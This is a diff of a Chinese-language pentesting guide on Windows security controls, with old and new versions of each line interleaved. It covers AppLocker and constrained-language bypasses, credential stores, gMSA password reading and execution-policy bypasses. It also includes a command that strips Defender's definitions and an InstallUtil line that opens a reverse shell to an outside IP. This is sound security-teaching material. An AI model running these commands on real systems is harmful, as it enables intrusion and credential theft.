* 例如,**`<FilePathCondition Path="%OSDRIVE%*\allowed*"/>`**,您可以在任何地方创建一个名为`allowed`的**文件夹**,它将被允许。
* 组织通常会专注于**阻止`%System32%\WindowsPowerShell\v1.0\powershell.exe`可执行文件**,但忽略了**其他**[**PowerShell可执行文件位置**](https://www.powershelladmin.com/wiki/PowerShell\_Executables\_File\_System\_Locations),如`%SystemRoot%\SysWOW64\WindowsPowerShell\v1.0\powershell.exe`或`PowerShell_ISE.exe`。
* **很少启用DLL强制执行**,因为它可能会给系统增加额外负载,并需要大量测试以确保不会出现问题。因此,使用**DLL作为后门**将有助于绕过AppLocker
* 您可以使用[**ReflectivePick**](https://github.com/PowerShellEmpire/PowerTools/tree/master/PowerPick)或[**SharpPick**](https://github.com/PowerShellEmpire/PowerTools/tree/master/PowerPick)在任何进程中**执行Powershell**代码并绕过AppLocker。有关更多信息请查看[https://hunter2.gitbook.io/darthsidious/defense-evasion/bypassing-applocker-and-powershell-contstrained-language-mode](https://hunter2.gitbook.io/darthsidious/defense-evasion/bypassing-applocker-and-powershell-contstrained-language-mode)。
* 例如,**`<FilePathCondition Path="%OSDRIVE%*\allowed*"/>`**,您可以在任何地方创建一个 **名为 `allowed` 的文件夹**,它将被允许。
* 组织通常还专注于 **阻止 `%System32%\WindowsPowerShell\v1.0\powershell.exe` 可执行文件**,但忘记了 **其他** [**PowerShell 可执行文件位置**](https://www.powershelladmin.com/wiki/PowerShell\_Executables\_File\_System\_Locations) `%SystemRoot%\SysWOW64\WindowsPowerShell\v1.0\powershell.exe` `PowerShell_ISE.exe`
* **DLL 强制执行很少启用**,因为它可能对系统造成额外负担,并且需要大量测试以确保不会出现故障。因此,使用 **DLL 作为后门将有助于绕过 AppLocker**
* 您可以使用 [**ReflectivePick**](https://github.com/PowerShellEmpire/PowerTools/tree/master/PowerPick) [**SharpPick**](https://github.com/PowerShellEmpire/PowerTools/tree/master/PowerPick) 在任何进程中 **执行 Powershell** 代码并绕过 AppLocker。有关更多信息请查看[https://hunter2.gitbook.io/darthsidious/defense-evasion/bypassing-applocker-and-powershell-contstrained-language-mode](https://hunter2.gitbook.io/darthsidious/defense-evasion/bypassing-applocker-and-powershell-contstrained-language-mode)。
## 凭据存储
### 安全帐户管理器SAM
### 安全账户管理器 (SAM)
本地凭据存在于此文件中,密码已经被哈希
本地凭据存储在此文件中,密码经过哈希处理
### 本地安全机构LSA- LSASS
### 本地安全机构 (LSA) - LSASS
**凭据**(哈希)被**保存**在此子系统的**内存**中,用于单点登录。\
**LSA**管理本地**安全策略**(密码策略,用户权限...**身份验证****访问令牌**...\
LSA将**检查**提供的凭据是否在**SAM**文件中(用于本地登录),并与**域控制器**通信以验证域用户。
**凭据**(哈希)被 **保存** 在此子系统的 **内存** 中,以实现单点登录。\
**LSA** 管理本地 **安全策略**(密码策略、用户权限...)、**身份验证**、**访问令牌**...\
LSA 将是 **检查** 提供的凭据的 **SAM** 文件(用于本地登录)并 **与** 域控制器 **通信** 以验证域用户。
**凭据**被**保存**在**LSASS进程**中Kerberos票证NT和LM哈希易于解密的密码。
**凭据****保存****进程 LSASS**Kerberos 票证、NT 和 LM 哈希、易于解密的密码。
### LSA秘密
### LSA 秘密
LSA可能会在磁盘中保存一些凭据:
LSA 可能会在磁盘上保存一些凭据:
* Active Directory计算机帐户的密码(无法访问的域控制器)。
* Windows服务帐户的密码
* Active Directory 的计算机账户密码(无法访问的域控制器)。
* Windows 服务账户的密码
* 计划任务的密码
* 更多IIS应用程序的密码...
* 更多IIS 应用程序的密码...
### NTDS.dit
这是Active Directory的数据库。仅存在于域控制器中。
这是 Active Directory 的数据库。仅存在于域控制器中。
## Defender
[**Microsoft Defender**](https://en.wikipedia.org/wiki/Microsoft\_Defender)是Windows 10和Windows 11以及Windows Server版本中可用的防病毒软件。它**阻止**常见的渗透测试工具,如**`WinPEAS`**。但是,有方法可以**绕过这些保护**
[**Microsoft Defender**](https://en.wikipedia.org/wiki/Microsoft\_Defender) 是 Windows 10 和 Windows 11 以及 Windows Server 版本中可用的防病毒软件。它 **阻止** 常见的 pentesting 工具,如 **`WinPEAS`**。然而,有方法可以 **绕过这些保护**
### 检查
要检查**Defender**的**状态**您可以执行PS cmdlet **`Get-MpComputerStatus`**(检查**`RealTimeProtectionEnabled`**的值以了解是否已激活):
要检查 **Defender** **状态**,您可以执行 PS cmdlet **`Get-MpComputerStatus`**(检查 **`RealTimeProtectionEnabled`** 的值以了解它是否处于活动状态):
<pre class="language-powershell"><code class="lang-powershell">PS C:\> Get-MpComputerStatus
@ -111,7 +112,7 @@ NISEngineVersion : 0.0.0.0
PSComputerName :
</code></pre>
您也可以运行以下命令进行枚举
要枚举它,您还可以运行
```bash
WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayName /Format:List
wmic /namespace:\\root\securitycenter2 path antivirusproduct
@ -120,73 +121,74 @@ sc query windefend
#Delete all rules of Defender (useful for machines without internet access)
"C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All
```
## 加密文件系统EFS
## 加密文件系统 (EFS)
EFS通过加密来保护文件,利用称为**文件加密密钥FEK**的**对称密钥**。该密钥使用用户的**公钥**加密,并存储在加密文件的$EFS **备用数据流**中。需要解密时,用户的数字证书对应的**私钥**用于从$EFS流中解密FEK。更多详细信息可在[此处](https://en.wikipedia.org/wiki/Encrypting\_File\_System)找到。
EFS 通过加密保护文件,使用称为 **文件加密密钥 (FEK)****对称密钥**。该密钥使用用户的 **公钥** 进行加密,并存储在加密文件的 $EFS **替代数据流** 中。当需要解密时,使用用户数字证书的相应 **私钥** 从 $EFS 流中解密 FEK。更多细节可以在 [这里](https://en.wikipedia.org/wiki/Encrypting\_File\_System) 找到。
**无需用户启动的解密场景**包括:
**无需用户启动的解密场景** 包括:
- 当文件或文件夹移动到非EFS文件系统如[FAT32](https://en.wikipedia.org/wiki/File\_Allocation\_Table))时,它们会自动解密。
- 通过SMB/CIFS协议发送的加密文件在传输之前会被解密。
* 当文件或文件夹被移动到非 EFS 文件系统(如 [FAT32](https://en.wikipedia.org/wiki/File\_Allocation\_Table))时,它们会自动解密。
* 通过 SMB/CIFS 协议在网络上传输的加密文件在传输前会被解密。
这种加密方法允许所有者**透明访问**加密文件。然而,仅仅更改所有者的密码并登录将不允许解密。
这种加密方法允许 **透明访问** 加密文件的所有者。然而,仅仅更改所有者的密码并登录并不能允许解密。
**要点**
**关键要点**
- EFS使用对称FEK使用用户的公钥加密。
- 解密使用用户的私钥访问FEK。
- 在特定条件下会自动解密如复制到FAT32或网络传输。
- 所有者可以访问加密文件而无需额外步骤。
* EFS 使用对称 FEK使用用户的公钥加密。
* 解密使用用户的私钥访问 FEK。
* 在特定条件下会自动解密,例如复制到 FAT32 或网络传输。
* 加密文件对所有者可访问,无需额外步骤。
### 检查EFS信息
### 检查 EFS 信息
检查**用户**是否**使用**了此**服务**,检查路径是否存在:`C:\users\<username>\appdata\roaming\Microsoft\Protect`
检查 **用户** 是否 **使用** 了此 **服务**,检查路径是否存在:`C:\users\<username>\appdata\roaming\Microsoft\Protect`
使用`cipher /c \<file>`检查文件的**访问权限**。您还可以在文件夹中使用`cipher /e`和`cipher /d`来**加密**和**解密**所有文件。
使用 cipher /c \<file\> 检查 **谁****访问** 文件的权限\
您还可以在文件夹内使用 `cipher /e``cipher /d`**加密****解密** 所有文件
### 解密EFS文件
### 解密 EFS 文件
#### 为权限系统
#### 为权限系统
这种方式需要**受害用户**在主机内运行一个**进程**。如果是这种情况,可以使用`meterpreter`会话来模拟用户进程的令牌(从`incognito`中的`impersonate_token`)。或者您可以直接`migrate`到用户的进程。
这种方式要求 **受害者用户** 在主机内 **运行** 一个 **进程**。如果是这种情况,使用 `meterpreter` 会话可以模拟用户进程的令牌(`impersonate_token` 来自 `incognito`)。或者您可以直接 `migrate` 到用户的进程。
#### 知道用户的密码
{% embed url="https://github.com/gentilkiwi/mimikatz/wiki/howto-~-decrypt-EFS-files" %}
## 群组管理服务帐户gMSA
## 组管理服务账户 (gMSA)
微软开发了**群组管理服务帐户gMSA**以简化IT基础设施中服务帐户的管理。与通常启用“**密码永不过期**”设置的传统服务帐户不同gMSA提供了更安全和可管理的解决方案:
微软开发了 **组管理服务账户 (gMSA)** 以简化 IT 基础设施中服务账户的管理。与传统的服务账户(通常启用“**密码永不过期**”设置不同gMSA 提供了更安全和可管理的解决方案:
- **自动密码管理**gMSA使用一个复杂的、240字符的密码根据域或计算机策略自动更改。这个过程由微软的密钥分发服务KDC处理消除了手动密码更新的需要。
- **增强安全性**:这些帐户不会被锁定,也不能用于交互式登录,增强了安全性。
- **多主机支持**gMSA可以在多个主机之间共享非常适合在多台服务器上运行的服务。
- **定时任务功能**与托管服务帐户不同gMSA支持运行定时任务。
- **简化的SPN管理**当计算机的sAMaccount详细信息或DNS名称发生变化时系统会自动更新服务主体名称SPN简化了SPN管理。
* **自动密码管理**gMSA 使用复杂的 240 字符密码,自动根据域或计算机策略进行更改。此过程由微软的密钥分发服务 (KDC) 处理,消除了手动更新密码的需要。
* **增强安全性**:这些账户免受锁定,并且不能用于交互式登录,从而增强了安全性。
* **多主机支持**gMSA 可以在多个主机之间共享,非常适合在多个服务器上运行的服务。
* **计划任务能力**与管理服务账户不同gMSA 支持运行计划任务。
* **简化 SPN 管理**:当计算机的 sAMaccount 详细信息或 DNS 名称发生更改时,系统会自动更新服务主体名称 (SPN),简化 SPN 管理。
gMSA的密码存储在LDAP属性_**msDS-ManagedPassword**_中并且由域控制器DCs每30天自动重置一次。这个密码是一个加密的数据块称为[MSDS-MANAGEDPASSWORD\_BLOB](https://docs.microsoft.com/en-us/openspecs/windows\_protocols/ms-adts/a9019740-3d73-46ef-a9ae-3ea8eb86ac2e)只能由授权管理员和安装了gMSA的服务器检索确保了一个安全的环境。要访问这些信息需要一个安全连接LDAPS或者连接必须经过“密封和安全”认证。
gMSA 的密码存储在 LDAP 属性 _**msDS-ManagedPassword**_ 中,并由域控制器 (DC) 每 30 天自动重置一次。此密码是一个称为 [MSDS-MANAGEDPASSWORD\_BLOB](https://docs.microsoft.com/en-us/openspecs/windows\_protocols/ms-adts/a9019740-3d73-46ef-a9ae-3ea8eb86ac2e) 的加密数据块,仅可由授权管理员和安装 gMSA 的服务器检索,从而确保安全环境。要访问此信息,需要安全连接,例如 LDAPS或者连接必须经过“密封和安全”认证。
![https://cube0x0.github.io/Relaying-for-gMSA/](../.gitbook/assets/asd1.png)
您可以使用[GMSAPasswordReader](https://github.com/rvazarkar/GMSAPasswordReader)来读取这个密码:
您可以使用 [**GMSAPasswordReader**](https://github.com/rvazarkar/GMSAPasswordReader)** 读取此密码:**
```
/GMSAPasswordReader --AccountName jkohler
```
[**在此帖子中找更多信息**](https://cube0x0.github.io/Relaying-for-gMSA/)
[**在此帖子中更多信息**](https://cube0x0.github.io/Relaying-for-gMSA/)
还可以查看这个关于如何执行**NTLM中继攻击**以**读取** **gMSA** **密码**的[网页](https://cube0x0.github.io/Relaying-for-gMSA/)。
此外,请查看此[网页](https://cube0x0.github.io/Relaying-for-gMSA/)关于如何执行**NTLM中继攻击**以**读取** **gMSA**的**密码**
## LAPS
**本地管理员密码解决方案LAPS**,可从[Microsoft](https://www.microsoft.com/en-us/download/details.aspx?id=46899)下载,可管理本地管理员密码。这些密码是**随机的**、独特的,并且**定期更改**存储在Active Directory中。通过ACLs对授权用户进行限制访问这些密码。在授予足够权限的情况下,可以读取本地管理员密码。
**本地管理员密码解决方案LAPS**,可从[Microsoft](https://www.microsoft.com/en-us/download/details.aspx?id=46899)下载,允许管理本地管理员密码。这些密码是**随机生成**、唯一且**定期更改**的集中存储在Active Directory中。对这些密码的访问通过ACL限制为授权用户。授予足够的权限后,可以读取本地管理员密码。
{% content-ref url="active-directory-methodology/laps.md" %}
[laps.md](active-directory-methodology/laps.md)
{% endcontent-ref %}
## PS 受限语言模式
## PS受限语言模式
PowerShell [**受限语言模式**](https://devblogs.microsoft.com/powershell/powershell-constrained-language-mode/) **限制了许多**有效使用PowerShell所需的功能如阻止COM对象仅允许批准的.NET类型基于XAML的工作流程PowerShell类等。
PowerShell [**受限语言模式**](https://devblogs.microsoft.com/powershell/powershell-constrained-language-mode/) **锁定了许多有效使用PowerShell所需的功能**例如阻止COM对象仅允许批准的.NET类型、基于XAML的工作流、PowerShell类等。
### **检查**
```powershell
@ -198,22 +200,22 @@ $ExecutionContext.SessionState.LanguageMode
#Easy bypass
Powershell -version 2
```
在当前的Windows中绕过不起作用但可以使用[**PSByPassCLM**](https://github.com/padovah4ck/PSByPassCLM)。\
**要编译它,您可能需要** **添加引用** -> _浏览_ -> _浏览_ -> 添加 `C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0\31bf3856ad364e35\System.Management.Automation.dll` 并**将项目更改为 .Net4.5**。
在当前的Windows中绕过方法将不起作用,但可以使用[ **PSByPassCLM**](https://github.com/padovah4ck/PSByPassCLM)。\
**要编译它,您可能需要** **_添加引用_** -> _浏览_ -> _浏览_ -> 添加 `C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0\31bf3856ad364e35\System.Management.Automation.dll` 并**将项目更改为 .Net4.5**。
#### 直接绕过:
#### 直接绕过
```bash
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe /logfile= /LogToConsole=true /U c:\temp\psby.exe
```
#### 反向 shell:
#### 反向 shell
```bash
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe /logfile= /LogToConsole=true /revshell=true /rhost=10.10.13.206 /rport=443 /U c:\temp\psby.exe
```
您可以使用[**ReflectivePick**](https://github.com/PowerShellEmpire/PowerTools/tree/master/PowerPick)或[**SharpPick**](https://github.com/PowerShellEmpire/PowerTools/tree/master/PowerPick)来在任何进程中执行Powershell代码并绕过受限模式。有关更多信息,请查看:[https://hunter2.gitbook.io/darthsidious/defense-evasion/bypassing-applocker-and-powershell-contstrained-language-mode](https://hunter2.gitbook.io/darthsidious/defense-evasion/bypassing-applocker-and-powershell-contstrained-language-mode)。
您可以使用 [**ReflectivePick**](https://github.com/PowerShellEmpire/PowerTools/tree/master/PowerPick) [**SharpPick**](https://github.com/PowerShellEmpire/PowerTools/tree/master/PowerPick) 在任何进程中 **执行 Powershell** 代码并绕过受限模式。有关更多信息,请查看:[https://hunter2.gitbook.io/darthsidious/defense-evasion/bypassing-applocker-and-powershell-contstrained-language-mode](https://hunter2.gitbook.io/darthsidious/defense-evasion/bypassing-applocker-and-powershell-contstrained-language-mode)。
## PS执行策略
## PS 执行策略
默认情况下设置为**restricted**。绕过此策略的主要方法:
默认情况下,它设置为 **restricted.** 绕过此策略的主要方法:
```powershell
1º Just copy and paste inside the interactive PS console
2º Read en Exec
@ -233,32 +235,32 @@ Powershell -command "Write-Host 'My voice is my passport, verify me.'"
9º Use EncodeCommand
$command = "Write-Host 'My voice is my passport, verify me.'" $bytes = [System.Text.Encoding]::Unicode.GetBytes($command) $encodedCommand = [Convert]::ToBase64String($bytes) powershell.exe -EncodedCommand $encodedCommand
```
更多内容请查看[这里](https://blog.netspi.com/15-ways-to-bypass-the-powershell-execution-policy/)
更多信息可以在 [这里](https://blog.netspi.com/15-ways-to-bypass-the-powershell-execution-policy/) 找到。
## 安全支持提供程序接口SSPI
## 安全支持提供者接口 (SSPI)
是用于验证用户的API。
是用于验证用户的 API。
SSPI将负责找到两台想要通信的机器的适当协议。首选方法是Kerberos。然后SSPI将协商将使用哪种验证协议这些验证协议称为安全支持提供程序SSP以DLL的形式位于每台Windows机器中两台机器必须支持相同的协议才能通信。
SSPI 将负责为想要通信的两台机器找到合适的协议。首选的方法是 Kerberos。然后SSPI 将协商使用哪个认证协议,这些认证协议称为安全支持提供者 (SSP),以 DLL 的形式位于每台 Windows 机器内部,且两台机器必须支持相同的协议才能进行通信。
### 主要SSP
### 主要 SSPs
* **Kerberos**:首选
* %windir%\Windows\System32\kerberos.dll
* **NTLMv1**和**NTLMv2**:兼容性原因
* **NTLMv1** **NTLMv2**出于兼容性原因
* %windir%\Windows\System32\msv1\_0.dll
* **Digest**Web服务器和LDAP密码以MD5哈希形式
* **Digest**Web 服务器和 LDAP密码以 MD5 哈希形式存在
* %windir%\Windows\System32\Wdigest.dll
* **Schannel**SSL和TLS
* **Schannel**SSL TLS
* %windir%\Windows\System32\Schannel.dll
* **Negotiate**:用于协商使用的协议Kerberos或NTLMKerberos是默认值
* **Negotiate**用于协商使用的协议Kerberos NTLM默认是 Kerberos
* %windir%\Windows\System32\lsasrv.dll
#### 协商可以提供多种方法或仅一种。
#### 协商可以提供多种方法或仅提供一种。
## UAC - 用户户控制
## UAC - 用户户控制
[用户账户控制UAC](https://docs.microsoft.com/en-us/windows/security/identity-protection/user-account-control/how-user-account-control-works)是一项功能,可为**提升的活动**启用**同意提示**
[用户帐户控制 (UAC)](https://docs.microsoft.com/en-us/windows/security/identity-protection/user-account-control/how-user-account-control-works) 是一个启用 **提升活动的同意提示** 的功能
{% content-ref url="windows-security-controls/uac-user-account-control.md" %}
[uac-user-account-control.md](windows-security-controls/uac-user-account-control.md)
@ -267,23 +269,24 @@ SSPI将负责找到两台想要通信的机器的适当协议。首选方法是K
<figure><img src="../.gitbook/assets/image (3) (1) (1) (1) (1) (1) (1).png" alt=""><figcaption></figcaption></figure>
\
使用[**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks)轻松构建和**自动化工作流程**,由全球**最先进**的社区工具驱动。\
使用 [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) 轻松构建和 **自动化工作流程**,由世界上 **最先进** 的社区工具提供支持。\
立即获取访问权限:
{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}
***
{% hint style="success" %}
学习和实践 AWS 黑客技术:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks 培训 AWS 红队专家 (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
学习和实践 GCP 黑客技术: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks 培训 GCP 红队专家 (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>从零开始学习AWS黑客技术成为专家</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTEHackTricks AWS红队专家</strong></a><strong></strong></summary>
<summary>支持 HackTricks</summary>
支持HackTricks的其他方式
* 如果您想在HackTricks中看到您的**公司广告**或**下载PDF格式的HackTricks**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
* 获取[**官方PEASS & HackTricks周边产品**](https://peass.creator-spring.com)
* 发现[**PEASS家族**](https://opensea.io/collection/the-peass-family),我们的独家[**NFT**](https://opensea.io/collection/the-peass-family)收藏品
* **加入** 💬 [**Discord群**](https://discord.gg/hRep4RUj7f) 或 [**电报群**](https://t.me/peass) 或在**Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**上关注**我们。
* 通过向[**HackTricks**](https://github.com/carlospolop/hacktricks)和[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github仓库提交PR来分享您的黑客技巧。
* 查看 [**订阅计划**](https://github.com/sponsors/carlospolop)!
* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**电报群组**](https://t.me/peass) 或 **在 Twitter 上关注** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **通过向** [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github 仓库提交 PR 来分享黑客技巧。
</details>
{% endhint %}

View file

@ -1,32 +1,33 @@
# Windows安全控制
# Windows Security Controls
{% hint style="success" %}
学习和实践 AWS 黑客技术:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks 培训 AWS 红队专家 (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
学习和实践 GCP 黑客技术:<img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks 培训 GCP 红队专家 (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>从零开始学习AWS黑客技术成为专家</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTEHackTricks AWS红队专家</strong></a><strong></strong></summary>
<summary>支持 HackTricks</summary>
支持HackTricks的其他方式
* 如果您想看到您的**公司在HackTricks中做广告**或**下载PDF格式的HackTricks**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
* 获取[**官方PEASS & HackTricks周边产品**](https://peass.creator-spring.com)
* 探索[**PEASS家族**](https://opensea.io/collection/the-peass-family),我们的独家[**NFTs**](https://opensea.io/collection/the-peass-family)
* **加入** 💬 [**Discord群组**](https://discord.gg/hRep4RUj7f) 或 [**电报群组**](https://t.me/peass) 或 **关注**我们的**Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**。**
* 通过向[**HackTricks**](https://github.com/carlospolop/hacktricks)和[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github仓库提交PR来分享您的黑客技巧。
* 查看 [**订阅计划**](https://github.com/sponsors/carlospolop)!
* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**Telegram 群组**](https://t.me/peass) 或 **关注** 我们的 **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **通过向** [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub 仓库提交 PR 分享黑客技巧。
</details>
{% endhint %}
<figure><img src="../../.gitbook/assets/image (48).png" alt=""><figcaption></figcaption></figure>
使用[**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks)可以轻松构建和**自动化工作流程**,并由全球**最先进的**社区工具提供支持。\
立即获取访问权限:
使用 [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) 轻松构建和 **自动化工作流**,由世界上 **最先进**社区工具提供支持。\
今天就获取访问权限:
{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}
## AppLocker策略
## AppLocker 策略
应用程序白名单是一份批准的软件应用程序或可在系统上存在和运行的可执行文件列表。其目标是保护环境免受有害恶意软件和与组织特定业务需求不符的未经批准的软件
应用程序白名单是一个经过批准的软件应用程序或可执行文件的列表,这些应用程序或可执行文件被允许存在并在系统上运行。其目标是保护环境免受有害恶意软件和不符合组织特定业务需求的未批准软件的影响
[AppLocker](https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/applocker/what-is-applocker)是微软的**应用程序白名单解决方案**,让系统管理员控制**用户可以运行哪些应用程序和文件**。它提供对可执行文件、脚本、Windows安装程序文件、DLL、打包应用和打包应用安装程序的**细粒度控制**。\
组织通常会**阻止cmd.exe和PowerShell.exe**以及对某些目录的写访问,**但这些都可以被绕过**。
[AppLocker](https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/applocker/what-is-applocker) 是微软的 **应用程序白名单解决方案**,为系统管理员提供对 **用户可以运行哪些应用程序和文件** 的控制。它提供对可执行文件、脚本、Windows 安装程序文件、DLL、打包应用程序和打包应用程序安装程序的 **细粒度控制**。\
组织通常会 **阻止 cmd.exe 和 PowerShell.exe** 以及对某些目录的写入访问,**但这一切都可以被绕过**。
### 检查
@ -39,60 +40,60 @@ Get-AppLockerPolicy -Effective | select -ExpandProperty RuleCollections
$a = Get-ApplockerPolicy -effective
$a.rulecollections
```
这个注册表路径包含了AppLocker应用的配置和策略提供了一种查看系统上当前生效规则集的方式
此注册表路径包含由 AppLocker 应用的配置和策略,提供了一种查看系统上强制执行的当前规则集的方法
* `HKLM\Software\Policies\Microsoft\Windows\SrpV2`
### 绕过
* 用于绕过AppLocker策略的有用**可写文件夹**如果AppLocker允许在`C:\Windows\System32`或`C:\Windows`中执行任何操作,那么有**可写文件夹**可用于**绕过此限制**
* 有用的 **可写文件夹** 用于绕过 AppLocker 策略:如果 AppLocker 允许在 `C:\Windows\System32``C:\Windows` 内执行任何内容,则可以使用 **可写文件夹****绕过此限制**
```
C:\Windows\System32\Microsoft\Crypto\RSA\MachineKeys
C:\Windows\System32\spool\drivers\color
C:\Windows\Tasks
C:\windows\tracing
```
* 通常**受信任的**[**"LOLBAS's"**](https://lolbas-project.github.io/)二进制文件也可以用来绕过AppLocker。
* **编写不的规则也可能被绕过**
* 例如,**`<FilePathCondition Path="%OSDRIVE%*\allowed*"/>`**,您可以在任何地方创建一个名为`allowed`的**文件夹**,它将被允许。
* 组织通常也会专注于**阻止`%System32%\WindowsPowerShell\v1.0\powershell.exe`可执行文件**,但忽略了**其他**[**PowerShell可执行文件位置**](https://www.powershelladmin.com/wiki/PowerShell\_Executables\_File\_System\_Locations) ,如`%SystemRoot%\SysWOW64\WindowsPowerShell\v1.0\powershell.exe`或`PowerShell_ISE.exe`。
* **DLL强制执行很少启用**,因为它可能对系统造成额外负担,并且需要大量测试以确保不会出现故障。因此,使用**DLL作为后门将有助于绕过AppLocker**。
* 您可以使用[**ReflectivePick**](https://github.com/PowerShellEmpire/PowerTools/tree/master/PowerPick)或[**SharpPick**](https://github.com/PowerShellEmpire/PowerTools/tree/master/PowerPick)在任何进程中**执行Powershell**代码并绕过AppLocker。有关更多信息请查看[https://hunter2.gitbook.io/darthsidious/defense-evasion/bypassing-applocker-and-powershell-contstrained-language-mode](https://hunter2.gitbook.io/darthsidious/defense-evasion/bypassing-applocker-and-powershell-contstrained-language-mode)。
* 常见的 **trusted** [**"LOLBAS's"**](https://lolbas-project.github.io/) 二进制文件也可以用于绕过 AppLocker。
* **编写不的规则也可能被绕过**
* 例如,**`<FilePathCondition Path="%OSDRIVE%*\allowed*"/>`**,您可以在任何地方创建一个 **名为 `allowed` 的文件夹**,它将被允许。
* 组织通常还专注于 **阻止 `%System32%\WindowsPowerShell\v1.0\powershell.exe` 可执行文件**,但忘记了 **其他** [**PowerShell 可执行文件位置**](https://www.powershelladmin.com/wiki/PowerShell\_Executables\_File\_System\_Locations) `%SystemRoot%\SysWOW64\WindowsPowerShell\v1.0\powershell.exe` `PowerShell_ISE.exe`
* **DLL 强制执行很少启用**,因为它可能对系统造成额外负担,并且需要大量测试以确保不会出现故障。因此,使用 **DLL 作为后门将有助于绕过 AppLocker**
* 您可以使用 [**ReflectivePick**](https://github.com/PowerShellEmpire/PowerTools/tree/master/PowerPick) [**SharpPick**](https://github.com/PowerShellEmpire/PowerTools/tree/master/PowerPick) 在任何进程中 **执行 Powershell** 代码并绕过 AppLocker。有关更多信息请查看[https://hunter2.gitbook.io/darthsidious/defense-evasion/bypassing-applocker-and-powershell-contstrained-language-mode](https://hunter2.gitbook.io/darthsidious/defense-evasion/bypassing-applocker-and-powershell-contstrained-language-mode)。
## 凭据存储
### 安全帐户管理器SAM
### 安全账户管理器 (SAM)
本地凭据存在于此文件中,密码已经被哈希
本地凭据存储在此文件中,密码经过哈希处理
### 本地安全机构LSA- LSASS
### 本地安全机构 (LSA) - LSASS
**凭据**(哈希)被**保存**在此子系统的**内存**中,用于单点登录。\
**LSA**管理本地**安全策略**(密码策略,用户权限...**身份验证****访问令牌**...\
LSA将**检查**提供的凭据是否在**SAM**文件中(用于本地登录),并与**域控制器**通信以验证域用户。
**凭据**(哈希)被 **保存** 在此子系统的 **内存** 中,以实现单点登录。\
**LSA** 管理本地 **安全策略**(密码策略、用户权限...)、**身份验证**、**访问令牌**...\
LSA 将是 **检查** 提供的凭据的 **SAM** 文件(用于本地登录)并与 **域控制器** 进行通信以验证域用户。
**凭据**被**保存**在**LSASS进程**中Kerberos票据哈希NT和LM易于解密的密码。
**凭据****保存****进程 LSASS**Kerberos 票证、NT 和 LM 哈希、易于解密的密码。
### LSA秘密
### LSA 秘密
LSA可能会在磁盘中保存一些凭据:
LSA 可能会在磁盘上保存一些凭据:
* Active Directory计算机帐户的密码(无法访问的域控制器)。
* Windows服务帐户的密码
* Active Directory 的计算机账户密码(无法访问的域控制器)。
* Windows 服务账户的密码
* 计划任务的密码
* 更多IIS应用程序的密码...
* 更多IIS 应用程序的密码...
### NTDS.dit
这是Active Directory的数据库。仅存在于域控制器中。
这是 Active Directory 的数据库。仅存在于域控制器中。
## 防御者
## Defender
[**Microsoft Defender**](https://en.wikipedia.org/wiki/Microsoft\_Defender)是Windows 10和Windows 11中可用的防病毒软件以及Windows Server版本。它**阻止**常见的渗透测试工具,如**`WinPEAS`**。但是,有方法可以**绕过这些保护**
[**Microsoft Defender**](https://en.wikipedia.org/wiki/Microsoft\_Defender) 是 Windows 10 和 Windows 11 以及 Windows Server 版本中可用的防病毒软件。它 **阻止** 常见的 pentesting 工具,如 **`WinPEAS`**。然而,有方法可以 **绕过这些保护**
### 检查
要检查**Defender**的**状态**您可以执行PS cmdlet **`Get-MpComputerStatus`**(检查**`RealTimeProtectionEnabled`**的值以了解是否已激活):
要检查 **Defender** **状态**,您可以执行 PS cmdlet **`Get-MpComputerStatus`**(检查 **`RealTimeProtectionEnabled`** 的值以了解它是否处于活动状态):
<pre class="language-powershell"><code class="lang-powershell">PS C:\> Get-MpComputerStatus
@ -111,7 +112,7 @@ NISEngineVersion : 0.0.0.0
PSComputerName :
</code></pre>
